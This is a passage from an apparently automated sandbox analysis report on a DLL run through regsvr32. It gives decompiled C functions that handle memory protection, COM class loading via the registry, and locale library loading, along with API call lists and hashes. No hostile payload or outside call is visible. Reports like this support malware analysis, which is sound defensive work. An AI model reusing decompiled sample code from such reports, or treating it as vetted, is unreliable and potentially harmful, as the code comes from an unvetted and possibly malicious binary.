                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendState$DesktopFocusParentWindow
                                                                        • String ID:
                                                                        • API String ID: 4150626516-0
                                                                        • Opcode ID: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                        • Instruction ID: b978b154d262d257bd1bf3691abd3912275a9b299a299c021808da74b3d9ae9a
                                                                        • Opcode Fuzzy Hash: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                        • Instruction Fuzzy Hash: BD11CA32A00B39BFE7629BA68C84E593B98EB44792F114425FE41DF141D6B0EC41D7B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E10010839(void* __ecx, void* __eflags) {
                                                                        				void* _v8;
                                                                        				long _v12;
                                                                        				long _v16;
                                                                        				signed char _v23;
                                                                        				struct _MEMORY_BASIC_INFORMATION _v44;
                                                                        				struct _SYSTEM_INFO _v80;
                                                                        				void* _v92;
                                                                        				void* _t29;
                                                                        				int _t33;
                                                                        				intOrPtr _t35;
                                                                        				void* _t43;
                                                                        				void* _t46;
                                                                        				signed int _t49;
                                                                        				void* _t54;
                                                                        				void* _t55;
                                                                        				void* _t62;
                                                                        				void* _t63;
                                                                        
                                                                        				_t29 = 4;
                                                                        				E10010B20(_t29, __ecx);
                                                                        				_t55 = _t63;
                                                                        				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
                                                                        					L9:
                                                                        					_t33 = 0;
                                                                        				} else {
                                                                        					_t46 = _v44.AllocationBase;
                                                                        					GetSystemInfo( &_v80);
                                                                        					_t49 = _v80.dwPageSize;
                                                                        					_t35 =  *0x1004f3e0; // 0x2
                                                                        					_t54 = ( !(_t49 - 1) & _t55) - _t49;
                                                                        					asm("sbb esi, esi");
                                                                        					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
                                                                        					_v12 = _t49;
                                                                        					if(_t54 < _t62) {
                                                                        						goto L9;
                                                                        					} else {
                                                                        						if(_t35 == 1) {
                                                                        							_v8 = _t54;
                                                                        							goto L14;
                                                                        						} else {
                                                                        							_v8 = _t46;
                                                                        							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
                                                                        								_v8 = _v8 + _v44.RegionSize;
                                                                        								if((_v44.State & 0x00001000) == 0) {
                                                                        									continue;
                                                                        								} else {
                                                                        									_t43 = _v44.BaseAddress;
                                                                        									_v8 = _t43;
                                                                        									if((_v23 & 0x00000001) == 0) {
                                                                        										if(_t54 >= _t43) {
                                                                        											if(_t43 < _t62) {
                                                                        												_v8 = _t62;
                                                                        											}
                                                                        											VirtualAlloc(_v8, _v12, 0x1000, 4);
                                                                        											_t35 =  *0x1004f3e0; // 0x2
                                                                        											L14:
                                                                        											asm("sbb eax, eax");
                                                                        											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
                                                                        										} else {
                                                                        											goto L9;
                                                                        										}
                                                                        									} else {
                                                                        										_t33 = 1;
                                                                        									}
                                                                        								}
                                                                        								goto L15;
                                                                        							}
                                                                        							goto L9;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L15:
                                                                        				return _t33;
                                                                        			}




















                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 10010853
                                                                        • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10010864
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 100108AA
                                                                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 100108E8
                                                                        • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 1001090E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                        • String ID:
                                                                        • API String ID: 4136887677-0
                                                                        • Opcode ID: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                        • Instruction ID: ea62dba494344a01c7efc91e140871f3e8746f8623a2ca282db0dc9e1cf87e08
                                                                        • Opcode Fuzzy Hash: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                        • Instruction Fuzzy Hash: 60316D32E0425DEBEF10CBA8CD85AED7BB8EB05355F110165F981EB191DBB09A809B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E10025CEC(void* __ecx, void* __eflags) {
                                                                        				intOrPtr* _t21;
                                                                        				void* _t25;
                                                                        				struct HINSTANCE__* _t26;
                                                                        				_Unknown_base(*)()* _t30;
                                                                        				void* _t39;
                                                                        				CHAR* _t40;
                                                                        				void* _t42;
                                                                        				signed int* _t43;
                                                                        				void* _t44;
                                                                        				void* _t46;
                                                                        
                                                                        				E10011BF0(0x1003acec, _t46);
                                                                        				_t43 =  *(_t46 + 0x10);
                                                                        				 *_t43 =  *_t43 & 0x00000000;
                                                                        				E10025C6A(_t46 - 0x10,  *((intOrPtr*)(_t46 + 8)));
                                                                        				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                                                                        				_t21 = E100243B2();
                                                                        				_t38 =  *_t21;
                                                                        				 *(_t46 + 0x10) =  *((intOrPtr*)( *_t21 + 0xc))(_t39, _t42, __ecx) + 0x10;
                                                                        				 *(_t46 - 4) = 1;
                                                                        				_t25 = E1002583A( *((intOrPtr*)(_t46 - 0x10)), _t46 + 0x10);
                                                                        				_t40 =  *(_t46 + 0x10);
                                                                        				if(_t25 != 0) {
                                                                        					_t26 = LoadLibraryA(_t40);
                                                                        					if(_t26 == 0) {
                                                                        						goto L1;
                                                                        					}
                                                                        					_t30 = GetProcAddress(_t26, "DllGetClassObject");
                                                                        					if(_t30 == 0) {
                                                                        						_t44 = 0x800401f9;
                                                                        					} else {
                                                                        						_t44 =  *_t30( *((intOrPtr*)(_t46 + 8)),  *((intOrPtr*)(_t46 + 0xc)), _t43);
                                                                        					}
                                                                        					L6:
                                                                        					E100014B0(_t40 - 0x10, _t38);
                                                                        					E100014B0( *((intOrPtr*)(_t46 - 0x10)) + 0xfffffff0, _t38);
                                                                        					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
                                                                        					return _t44;
                                                                        				}
                                                                        				L1:
                                                                        				_t44 = 0x80040154;
                                                                        				goto L6;
                                                                        			}













                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10025CF1
                                                                          • Part of subcall function 10025C6A: wsprintfA.USER32 ref: 10025CC5
                                                                          • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                          • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                          • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                          • Part of subcall function 1002583A: RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                          • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                          • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                          • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,10025DBC,?,100430A8,00000000), ref: 10025D40
                                                                        • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 10025D50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpen$AddressH_prologLibraryLoadProcQueryValuewsprintf
                                                                        • String ID: DllGetClassObject
                                                                        • API String ID: 821125782-1075368562
                                                                        • Opcode ID: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                        • Instruction ID: 4c2bc5ab8f47dce9d6dfca02a5288212b81b2082d3bc100dcb553b8fe7e2210e
                                                                        • Opcode Fuzzy Hash: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                        • Instruction Fuzzy Hash: CB11BC3260021AAFDB11DFA4DC08BAF77B8FF00356F044969F812E7261DB34E9018BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E100348C4(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4, char _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char _v284;
                                                                        				intOrPtr _t10;
                                                                        				void* _t15;
                                                                        				void* _t19;
                                                                        				void* _t20;
                                                                        				void* _t22;
                                                                        
                                                                        				_t22 = __esi;
                                                                        				_t20 = __ecx;
                                                                        				_t19 = __ebx;
                                                                        				_t27 = _a8 - 0x800;
                                                                        				_t10 =  *0x1004c470; // 0x303bb91f
                                                                        				_v8 = _t10;
                                                                        				if(_a8 != 0x800) {
                                                                        					__eflags = GetLocaleInfoA(_a8, 3,  &_a8, 4);
                                                                        					if(__eflags != 0) {
                                                                        						goto L2;
                                                                        					} else {
                                                                        					}
                                                                        				} else {
                                                                        					lstrcpyA( &_a8, "LOC");
                                                                        					L2:
                                                                        					_push(_t22);
                                                                        					_t15 = E10011D44(_t19, _t20, _t27,  &_v284, 0x112, _a4,  &_a8);
                                                                        					if(_t15 == 0xffffffff || _t15 >= 0x112) {
                                                                        						_t12 = 0;
                                                                        						__eflags = 0;
                                                                        					} else {
                                                                        						_t12 = LoadLibraryA( &_v284);
                                                                        					}
                                                                        				}
                                                                        				return E100117AE(_t12, _v8);
                                                                        			}











                                                                        APIs
                                                                        • lstrcpyA.KERNEL32(00000800,LOC), ref: 100348E7
                                                                        • LoadLibraryA.KERNEL32(?), ref: 1003491A
                                                                        • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 1003492A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLibraryLoadLocalelstrcpy
                                                                        • String ID: LOC
                                                                        • API String ID: 864663389-519433814
                                                                        • Opcode ID: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                        • Instruction ID: 1b661f8c901bfcf78996fae171bebb1d1a637ee772a53719b66f99f2a01cec23
                                                                        • Opcode Fuzzy Hash: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                        • Instruction Fuzzy Hash: 6C018B3990111CAFEB62DFA0DC49EDE37ACEB00326F018562FA15DE190DB30EA448B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E10007AE5(struct HWND__* _a4, signed int _a8) {
                                                                        				struct _WINDOWPLACEMENT _v48;
                                                                        				int _t16;
                                                                        
                                                                        				if(E1000799F() == 0) {
                                                                        					if((_a8 & 0x00000003) == 0) {
                                                                        						if(IsIconic(_a4) == 0) {
                                                                        							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
                                                                        						} else {
                                                                        							_t16 = GetWindowPlacement(_a4,  &_v48);
                                                                        						}
                                                                        						if(_t16 == 0) {
                                                                        							return 0;
                                                                        						} else {
                                                                        							return E10007A99( &(_v48.rcNormalPosition), _a8);
                                                                        						}
                                                                        					}
                                                                        					return 0x12340042;
                                                                        				}
                                                                        				return  *0x1004edfc(_a4, _a8);
                                                                        			}






                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 83ae4de29b23ff51b0e8bec05b4b5c9f8fcd8e6cb892886513852504e8bddb0b
                                                                        • Instruction ID: 3a21d875c7eeece48a0e685930edcd66bc13eb96913376d54ee1399e2fea6754
                                                                        • Opcode Fuzzy Hash: 83ae4de29b23ff51b0e8bec05b4b5c9f8fcd8e6cb892886513852504e8bddb0b
                                                                        • Instruction Fuzzy Hash: DFF0C935A04119ABEB02EF61CC49EAE7FA9FB042C4B408025FD1AD506ADB38DA559B61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10001090() {
                                                                        				char _v8;
                                                                        				char _t12;
                                                                        				intOrPtr* _t16;
                                                                        				signed int _t18;
                                                                        
                                                                        				_t18 = 0;
                                                                        				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v8, 7) == 0) {
                                                                        					L5:
                                                                        					return GetACP();
                                                                        				} else {
                                                                        					_t12 = _v8;
                                                                        					_t16 =  &_v8;
                                                                        					if(_t12 == 0) {
                                                                        						goto L5;
                                                                        					} else {
                                                                        						do {
                                                                        							_t16 = _t16 + 1;
                                                                        							_t18 = _t12 + (_t18 + _t18 * 4) * 2 - 0x30;
                                                                        							_t12 =  *_t16;
                                                                        						} while (_t12 != 0);
                                                                        						if(_t18 != 0) {
                                                                        							return _t18;
                                                                        						} else {
                                                                        							goto L5;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}








                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32 ref: 10001096
                                                                        • GetLocaleInfoA.KERNEL32(00000000,00001004,00000007,00000007), ref: 100010A9
                                                                        • GetACP.KERNEL32 ref: 100010D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread
                                                                        • String ID:
                                                                        • API String ID: 4232894706-0
                                                                        • Opcode ID: e87460b6ede7ecce593e36227f27ce69e25290a2edb96822d484cbb01d0533fa
                                                                        • Instruction ID: 26a1fdc9c2cb66cfcd8947c1f0583feeb1697c74baf4304ef7dc7fad7aa6cfc5
                                                                        • Opcode Fuzzy Hash: e87460b6ede7ecce593e36227f27ce69e25290a2edb96822d484cbb01d0533fa
                                                                        • Instruction Fuzzy Hash: 3BF0E2366002B09AEE02DF61EC44ADB3BA4EF04BC1F814548EDC59B105E660AA0AC7E2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E1000DB7F(signed int* __ecx) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				intOrPtr _t240;
                                                                        				intOrPtr* _t241;
                                                                        				signed int _t249;
                                                                        				signed int _t253;
                                                                        				signed int _t254;
                                                                        				signed int _t260;
                                                                        				signed int _t263;
                                                                        				signed int _t267;
                                                                        				void* _t272;
                                                                        				void* _t274;
                                                                        				signed int _t276;
                                                                        				void* _t278;
                                                                        				signed int _t281;
                                                                        				void* _t304;
                                                                        				intOrPtr* _t311;
                                                                        				signed int _t312;
                                                                        				signed int _t313;
                                                                        				signed int _t314;
                                                                        				signed int _t315;
                                                                        				void* _t319;
                                                                        				signed int* _t320;
                                                                        				intOrPtr _t342;
                                                                        				signed int _t346;
                                                                        				signed int _t359;
                                                                        				signed int _t390;
                                                                        				signed int _t392;
                                                                        				signed int _t396;
                                                                        				void* _t402;
                                                                        				signed int _t405;
                                                                        				signed int _t408;
                                                                        				signed int _t410;
                                                                        				signed int _t414;
                                                                        				void* _t416;
                                                                        				signed int _t418;
                                                                        				signed int _t422;
                                                                        				void* _t423;
                                                                        				signed int _t427;
                                                                        				signed int _t430;
                                                                        				void* _t432;
                                                                        				void* _t434;
                                                                        				intOrPtr _t435;
                                                                        				signed int _t439;
                                                                        
                                                                        				E10011BF0(0x1003af23, _t432);
                                                                        				_t435 = _t434 - 0x54;
                                                                        				_t240 =  *0x1004c470; // 0x303bb91f
                                                                        				 *(_t432 - 0x3c) =  *(_t432 - 0x3c) & 0x00000000;
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				_t320 = __ecx;
                                                                        				 *((intOrPtr*)(_t432 - 0x14)) = _t240;
                                                                        				 *((intOrPtr*)(_t432 - 0x10)) = _t435;
                                                                        				 *((intOrPtr*)(_t432 - 0x48)) = __ecx;
                                                                        				asm("movsd");
                                                                        				 *((char*)(_t432 - 0x3d)) = 0;
                                                                        				_t241 =  *((intOrPtr*)(_t432 + 8));
                                                                        				 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
                                                                        				_t418 =  *((intOrPtr*)( *_t241))(_t241, 0x10040644, _t432 - 0x3c, _t402, _t416, _t319);
                                                                        				if(_t418 >= 0) {
                                                                        					_t419 = __ecx + 0x14;
                                                                        					__eflags =  *_t419;
                                                                        					 *(_t432 - 0x2c) = 0;
                                                                        					if( *_t419 != 0) {
                                                                        						 *((char*)(__ecx + 0x1c)) = 1;
                                                                        						goto L13;
                                                                        					} else {
                                                                        						 *(_t432 - 0x28) = 0;
                                                                        						_t311 =  *((intOrPtr*)(_t432 + 8));
                                                                        						 *(_t432 - 4) = 1;
                                                                        						_t312 =  *((intOrPtr*)( *_t311))(_t311, 0x10040624, _t432 - 0x28);
                                                                        						 *(_t432 - 0x38) = _t312;
                                                                        						__eflags = _t312;
                                                                        						_t313 =  *(_t432 - 0x28);
                                                                        						if(_t312 >= 0) {
                                                                        							_t314 =  *((intOrPtr*)( *_t313 + 0xc))(_t313, __ecx + 0xc, _t419, __ecx + 0x18);
                                                                        							_t419 = _t314;
                                                                        							__eflags = _t314;
                                                                        							_t315 =  *(_t432 - 0x28);
                                                                        							 *(_t432 - 4) = 0;
                                                                        							if(_t314 >= 0) {
                                                                        								__eflags = _t315;
                                                                        								 *((char*)(__ecx + 0x1c)) = 0;
                                                                        								if(_t315 != 0) {
                                                                        									 *((intOrPtr*)( *_t315 + 8))(_t315);
                                                                        								}
                                                                        								L13:
                                                                        								 *(_t432 - 0x34) = 0;
                                                                        								 *(_t432 - 4) = 2;
                                                                        								 *(_t432 - 0x34) = E1001F77E(_t320[3] * 0x34);
                                                                        								 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
                                                                        								__eflags =  *(_t432 - 0x34);
                                                                        								if( *(_t432 - 0x34) != 0) {
                                                                        									 *(_t432 - 4) = 4;
                                                                        									_t320[4] = E1001F77E(_t320[3]);
                                                                        									_t405 = 0;
                                                                        									__eflags = _t320[4];
                                                                        									 *(_t432 - 4) = 0;
                                                                        									if(__eflags != 0) {
                                                                        										 *(_t432 - 0x30) =  *(_t432 - 0x34);
                                                                        										 *(_t432 - 0x38) = 0;
                                                                        										while(1) {
                                                                        											__eflags = _t405 - _t320[3];
                                                                        											if(_t405 >= _t320[3]) {
                                                                        												break;
                                                                        											}
                                                                        											 *((char*)(_t405 + _t320[4])) = 0;
                                                                        											_t410 = _t405 + _t405 * 2 << 4;
                                                                        											_t272 = _t320[5] + _t410;
                                                                        											__eflags =  *(_t272 + 0x10) - _t320[9];
                                                                        											if( *(_t272 + 0x10) <= _t320[9]) {
                                                                        												L41:
                                                                        												_t342 =  *((intOrPtr*)(_t272 + 0x14));
                                                                        												__eflags = _t342 - 0xd;
                                                                        												if(_t342 != 0xd) {
                                                                        													__eflags = _t342 - 0x81;
                                                                        													if(_t342 == 0x81) {
                                                                        														_t156 = _t272 + 0x10;
                                                                        														 *_t156 =  *(_t272 + 0x10) + 1;
                                                                        														__eflags =  *_t156;
                                                                        													}
                                                                        													_t274 = _t320[5] + _t410;
                                                                        													__eflags =  *((short*)(_t274 + 0x14)) - 0x82;
                                                                        													if( *((short*)(_t274 + 0x14)) == 0x82) {
                                                                        														 *((intOrPtr*)(_t274 + 0x10)) =  *((intOrPtr*)(_t274 + 0x10)) +  *((intOrPtr*)(_t274 + 0x10)) + 2;
                                                                        													}
                                                                        													_t276 = _t320[5] + _t410;
                                                                        													__eflags = _t276;
                                                                        													 *(_t432 - 0x28) = _t276;
                                                                        													_t278 = E10009FD2( *(_t276 + 0x14) & 0x0000ffff);
                                                                        													_push(0);
                                                                        													goto L55;
                                                                        												} else {
                                                                        													 *(_t432 - 0x44) =  *(_t432 - 0x44) & 0x00000000;
                                                                        													 *(_t432 - 4) = 8;
                                                                        													 *(_t432 - 0x44) = E1001F77E(0x14);
                                                                        													 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
                                                                        													__eflags =  *(_t432 - 0x44);
                                                                        													if( *(_t432 - 0x44) != 0) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t414 =  *(_t432 - 0x38);
                                                                        														__eflags = _t414;
                                                                        														if(__eflags > 0) {
                                                                        															_t427 =  *(_t432 - 0x34) + 0x14;
                                                                        															__eflags = _t427;
                                                                        															do {
                                                                        																_push( *_t427);
                                                                        																L1001F7A9(_t320, _t414, _t427, __eflags);
                                                                        																_t427 = _t427 + 0x34;
                                                                        																_t414 = _t414 - 1;
                                                                        																__eflags = _t414;
                                                                        															} while (__eflags != 0);
                                                                        														}
                                                                        														goto L47;
                                                                        													}
                                                                        												}
                                                                        											} else {
                                                                        												__eflags =  *((short*)(_t272 + 0x14)) - 0xd;
                                                                        												if( *((short*)(_t272 + 0x14)) == 0xd) {
                                                                        													goto L41;
                                                                        												} else {
                                                                        													_t359 = _t320[8];
                                                                        													__eflags = _t359 - 2;
                                                                        													if(_t359 != 2) {
                                                                        														__eflags = _t359 - 1;
                                                                        														if(_t359 != 1) {
                                                                        															__eflags =  *((char*)(_t432 - 0x3d));
                                                                        															if(__eflags == 0) {
                                                                        																_t419 = 0;
                                                                        																 *((intOrPtr*)(_t432 - 0x5c)) = 0x89;
                                                                        																 *((intOrPtr*)(_t432 - 0x58)) = 0x8b;
                                                                        																 *(_t432 - 0x50) = 0;
                                                                        																 *(_t432 - 0x4c) = 0;
                                                                        																E1000DAA7(_t320, _t410, 0, __eflags,  *((intOrPtr*)(_t432 + 8)), _t432 - 0x5c, _t432 - 0x50, 2);
                                                                        																__eflags =  *(_t432 - 0x50);
                                                                        																if( *(_t432 - 0x50) == 0) {
                                                                        																	__eflags =  *(_t432 - 0x4c);
                                                                        																	if( *(_t432 - 0x4c) != 0) {
                                                                        																		_t419 = 0x1004079c;
                                                                        																		goto L32;
                                                                        																	}
                                                                        																} else {
                                                                        																	_t419 = 0x100407ac;
                                                                        																	L32:
                                                                        																	asm("movsd");
                                                                        																	asm("movsd");
                                                                        																	asm("movsd");
                                                                        																	asm("movsd");
                                                                        																}
                                                                        																 *((char*)(_t432 - 0x3d)) = 1;
                                                                        															}
                                                                        															 *(_t432 - 0x44) =  *(_t432 - 0x44) & 0x00000000;
                                                                        															 *(_t432 - 4) = 6;
                                                                        															 *(_t432 - 0x44) = E1001F77E(0x14);
                                                                        															 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
                                                                        															__eflags =  *(_t432 - 0x44);
                                                                        															if( *(_t432 - 0x44) != 0) {
                                                                        																L49:
                                                                        																 *( *(_t432 - 0x44)) =  *( *(_t432 - 0x44)) & 0x00000000;
                                                                        																asm("movsd");
                                                                        																asm("movsd");
                                                                        																asm("movsd");
                                                                        																asm("movsd");
                                                                        																_t410 =  *(_t432 - 0x38) +  *(_t432 - 0x38) * 2 << 4;
                                                                        																 *((short*)(_t320[5] + _t410 + 0x14)) = 0xd;
                                                                        																 *((intOrPtr*)(_t320[5] + _t410 + 0x10)) = 4;
                                                                        																 *(_t432 - 0x28) = _t320[5] + _t410;
                                                                        																_t278 = E10009FD2( *(_t320[5] + _t410 + 0x14) & 0x0000ffff);
                                                                        																_push( *(_t432 - 0x44));
                                                                        																L55:
                                                                        																_t169 =  *(_t432 - 0x2c) - 1; // -1
                                                                        																_t419 = _t278 + _t169 &  !(_t278 - 1);
                                                                        																_t281 =  *(_t432 - 0x28);
                                                                        																_t346 =  *((intOrPtr*)(_t281 + 0x10)) + _t419 + 0x00000003 & 0xfffffffc;
                                                                        																_t390 = _t346 + 0x00000007 & 0xfffffffc;
                                                                        																_push(_t390);
                                                                        																_push(_t346);
                                                                        																_push(_t419);
                                                                        																_push(0);
                                                                        																 *(_t432 - 0x2c) = _t390;
                                                                        																 *(_t432 - 0x2c) =  *(_t432 - 0x2c) + 4;
                                                                        																 *(_t432 - 0x28) = _t390;
                                                                        																_push(0);
                                                                        																_push(0);
                                                                        																_push( *((intOrPtr*)(_t281 + 0x10)));
                                                                        																__eflags = 0;
                                                                        																_push(0);
                                                                        																_push( *((intOrPtr*)(_t281 + 8)));
                                                                        																_push( *(_t432 - 0x30));
                                                                        																E10009E21();
                                                                        																_t435 = _t435 + 0x30;
                                                                        																goto L56;
                                                                        															} else {
                                                                        																_t414 =  *(_t432 - 0x38);
                                                                        																__eflags = _t414;
                                                                        																if(__eflags > 0) {
                                                                        																	_t430 =  *(_t432 - 0x34) + 0x14;
                                                                        																	__eflags = _t430;
                                                                        																	do {
                                                                        																		_push( *_t430);
                                                                        																		L1001F7A9(_t320, _t414, _t430, __eflags);
                                                                        																		_t430 = _t430 + 0x34;
                                                                        																		_t414 = _t414 - 1;
                                                                        																		__eflags = _t414;
                                                                        																	} while (__eflags != 0);
                                                                        																}
                                                                        																L47:
                                                                        																_push( *(_t432 - 0x34));
                                                                        																L1001F7A9(_t320, _t414, _t419, __eflags);
                                                                        																_push(_t320[4]);
                                                                        																L1001F7A9(_t320, _t414, _t419, __eflags);
                                                                        																_t320[4] = _t320[4] & 0x00000000;
                                                                        																goto L15;
                                                                        															}
                                                                        														} else {
                                                                        															 *(_t272 + 0x15) =  *(_t272 + 0x15) | 0x00000040;
                                                                        															 *((intOrPtr*)(_t320[5] + _t410 + 0x10)) = 4;
                                                                        															 *((char*)( *(_t432 - 0x38) + _t320[4])) = 1;
                                                                        															 *(_t432 - 0x28) = _t320[5] + _t410;
